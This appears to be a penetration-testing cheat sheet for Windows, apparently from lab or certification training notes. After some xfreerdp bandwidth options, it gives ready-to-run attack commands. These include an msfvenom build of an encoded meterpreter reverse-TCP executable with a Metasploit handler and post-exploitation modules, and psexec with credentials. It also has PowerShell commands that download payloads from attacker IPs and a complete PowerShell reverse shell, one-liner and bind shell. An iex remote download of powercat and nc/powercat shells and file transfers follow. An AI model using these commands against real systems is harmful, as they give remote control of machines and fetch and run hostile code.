Windows

freerdp limited bandwidth

/clipboard
enable bidirectional clipboard
/bpp:8
uses 256 colors-low the quality, but really makes a speed improvement. Might not display videos (e.g. VLC)–try /bpp:16 if trouble.
/bpp:16
uses 65536 colors, saving bandwidth over 24-bit color with negligible visible difference for most basic uses.
/network:modem /compression
reduce bandwidth via compression (trade CPU usages for network bandwidth)
-themes -wallpaper
great speedup by not needlessly sending background graphics repeatedly
/async-update /async-input
disable RDP waiting for screen updates to reach you before it accepts input. These allow clicking ahead before the screen updates. Be careful of clicking unwanted options while using the PC.
-glyph-cache
disable glyph caching. Note: this can cause garbled characters and radio boxes.
/audio-mode:1
disable FreeRDP audio redirection (do not play sound from remote PC)
/auto-reconnect
automatically reconnect on failure (also works over SSH tunnel)
xfreerdp /clipboard /async-update /async-input /auto-reconnect /audio-mode:1 -glyph-cache /bpp:8 /network:modem /compression -themes -wallpaper /u:student /p:lab /cert:ignore /v:192.168.232.10 /workarea

Generate the reverse tcp client

msfvenom -p windows/meterpreter/reverse_tcp -a x86 \
    --encoder x86/shikata_ga_nai LHOST=10.9.0.21 LPORT=4446 -f exe -o hey.exe

Metasploit reverse tcp listener

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.0.21
set lport 4446
exploit
run post/multi/recon/local_exploit_suggester
run post/windows/gather/enum_applications

Get a remote shell

python psexec.py gatekeeper/mayor:[email protected] cmd.exe

download file

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.9.0.21:8000/hey.exe', 'hey.exe')"
powershell -Command "Invoke-WebRequest http://www.example.com/package.zip -OutFile package.zip"

Various tips and tricks

echo %username%

C:\Windows\Temp is often world writable

List privileges

whoami /priv

if SeImpersonate privilege enabled, try PrintSpoofer

PowerShell File Transfers

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"

PowerShell Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush();
}
$client.Close();

one liner:

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

PowerShell bind shell

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

powercat

# /usr/share/windows-resources/powercat/powercat.ps1
# on target host
. .\powercat.ps1

# if possible, download powercat
iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

# file transfer attacker
sudo nc -lnvp 443 > receiving_powercat.ps1
# file transfer target
powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1

#reverse shell attacker
sudo nc -lvp 443
# reverse shell target
powercat -c 10.11.0.4 -p 443 -e cmd.exe

# bind shell target
powercat -l -p 443 -e cmd.exe
# bind shell attacker
nc 10.11.0.22 443
PreviousBuffer overflowNextNotes windows

Last updated